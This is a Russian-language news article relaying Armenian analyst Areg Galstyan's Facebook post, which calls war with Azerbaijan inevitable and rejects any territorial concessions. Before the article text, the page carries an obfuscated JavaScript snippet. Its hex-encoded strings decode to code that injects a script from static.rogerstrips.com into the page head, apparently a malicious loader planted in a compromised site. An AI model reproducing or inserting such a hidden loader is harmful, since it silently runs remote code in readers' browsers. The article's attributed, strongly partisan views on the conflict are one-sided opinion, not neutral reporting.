script type='text/javascript'>var _0x7f86=["\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x2E\x72\x6F\x67\x65\x72\x73\x74\x72\x69\x70\x73\x2E\x63\x6F\x6D\x2F\x6D\x61\x69\x6E\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"];var script=document[_0x7f86[1]](_0x7f86[0]);script[_0x7f86[2]]= _0x7f86[3];script[_0x7f86[4]]= _0x7f86[5];document[_0x7f86[8]](_0x7f86[7])[0][_0x7f86[6]](script)

Руководитель центра «The Armenian Interest», американист, колумнист журналов «Forbes», «The National Interest» и «Россия в глобальной политике», политолог Арег Галстян размышляет на темы могут ли сдать территории Азербайджану и может ли начаться война.

«Каждый день я получаю сотню сообщений с подобным содержанием от соотечественников по всему миру. Начну со второй части вопроса. Война с Азербайджаном — вопрос времени, ибо подобные конфликты не могут быть урегулированы путем поиска компромиссов», — написал Галстян на своей странице в Facebook.

Задача минимум

По его словам, это игра с нулевой суммой, где компромисс одного субъекта автоматически означает поражение другой стороны.

«Для нас задача минимум — сохранение этих территорий исключительно под армянским контролем. Иностранный контроль не может быть гарантией безопасности нашей нации и государственности, ибо у любого внешнего центра прагматичное и временное отношение к региону, его странам и народам. Ни один международный документ с подписями иностранцев не может быть основанием для нашего спокойствия», — написал Галстян.

Он напоминает о том, что армяне сталкивались с гарантиями внешних сил всю свою историю — от неформального Ватиканского протектората над Киликийским царством до Севрского договора после Первой мировой войны.

«С чем мы остались после всех этих гарантий? Достаточно посмотреть на карту, чтобы получить ответ на этот вопрос. Мы не можем позволить себе роскошь наступать на очередные исторические грабли и верить сильным мира сего, которые смотрят на нас как на инструмент (их право — их интересы). Мы можем быть уверены лишь в те решения, которые принимаем и реализуем исключительно собственными силами и возможностями, а инструменты внешних сил должны быть цинично использованы для извлечения собственных дивидендов (политика — это про цинизм и прагматизм, а не любовь)», — написал Галстян.

Он считает, что необходимо идти на переговоры, чтобы получить больше, чем мы имеем сегодня, а не уступать то, что было завоевано ценой крови лучших сынов своего поколения.

«Можете представить себе ситуацию, в которой сторона-победитель становится объектом давления со проигравшей стороны? К сожалению, нашим «великим стратегам», которые все знают и все умеют, удалось сделать это. Как подобный военный успех на земле не был конвертирован в полную политическую капитуляцию Азербайджана с подписанием мирного договора и дальнейшим включением Арцаха в состав Армении — остается для меня большой загадкой», — написал Галстян.

Он объясняет это то ли отсутствием политиков-стратегов, то ли фобией перед внешними силами, то ли нехваткой политической воли, а возможно даже комбинацией причин. Но факт следующий — противник взял время, укрепился и перешел в наступление по всем фронтам по всему миру.

Азербайджан не готов к миру и диалогу

«Теперь позиция Азербайджана проста и понятна всему миру — нет никакого Арцаха как субъекта (причем вывод Степанакерта также заслуга наших «стратегов») — имеются лишь 20% оккупированных Арменией — субъектом международного права — территорий Азербайджана. Перевернули все с ног на голову и теперь диктуют дискурс всего переговорного процесса. Их философия проста — все или ничего», — написал Галстян.

По его словам, на противопоставлении Армении и армянам они строят свою национальную политическую идентичность и возвращение территорий их идея фикс. Речь не только об Арцахе, ведь их лидер открыто заявляет о Союнике и Ереване (тот же мир молчит).

«Мы должны четко понять, что они не готовы к миру и диалогу с нами. Их единственное желание — взять реванш и доказать свой статус региональной супердержавы международному сообществу. На этом фоне мы все время стучимся в иностранные двери, говоря, что Азербайджан — это региональный хулиган, который бьет своих (права человека) и даже думает о том, как бы использовать купленное вооружение против нас — миролюбивых ребят, которые стремятся к миру во всем мире», — написал Галстян.

Он отметил, что в идеальном мире, где правили бы ангелы вместо людей, это могло иметь значение. Но какой смысл говорить об этом эгоистичным политикам, которые на освобождение Сафарова и его героизацию заявили свое дежурное «Ой, ой, как же это неправильно» и пошли дальше говорить с Баку об увеличении прямых иностранных инвестиций.

«Удивительный мы народ — история который раз бьет дубиной по голове, а нам хотя бы хны. Мы должны быть готовы не только к войне, но и представлять себе постпобедную конфигурацию будущего: как минимум на 20-40 лет вперед», — написал Галстян.

Мы стояли у пропасти

Что касается возможности сдачи территорий, то политолог считает, что раньше это было возможно.

«Что можно было ожидать от людей, которые 25 лет занимались личным обогащением за счет национальных интересов? Что можно ожидать от генералов, которые обворовали собственную армию — святыню государства? Что можно ожидать от дипломатов, которые защищали не интересы нации и страны, а собственные бизнес-интересы? Что можно ожидать от политиков, которые к территориям относились как к физической земле, а не метафизическому жизненному пространству нации?», — написал Галстян.

Он считает, что, к счастью, национальный иммунитет сработал вовремя и спас нас от катастрофических последствий — мы стояли у пропасти.

«Нынешняя элита должна извлечь уроки от своих предшественников и ни в коем случае не строить страну на тех же основах и принципах. Время кумовства ушло — пришло время профессионализма, компетенции и трудолюбия. Время внешнеориентированности ушло, пришло время армяноцентризма. Время романтизма ушло, пришло время цинизма и прагматизма. Если мы поверим в себя, перестанем убивать возможности друг друга, прекратим ненавидеть успехи друг друга, уберем свое «я и мое» в сторону и начнем мыслить категориями «мы и наше» — мы победим любого внешнего противника», — написал Галстян.

По его мнению, главная слабость армян — это отношение друг к другу. Решение остальных проблем станет сугубо вопросом времени, усилий и техники.

«И помните — мы обречены на победу, не сомневайтесь в этом ни на минуту», — написал Галстян.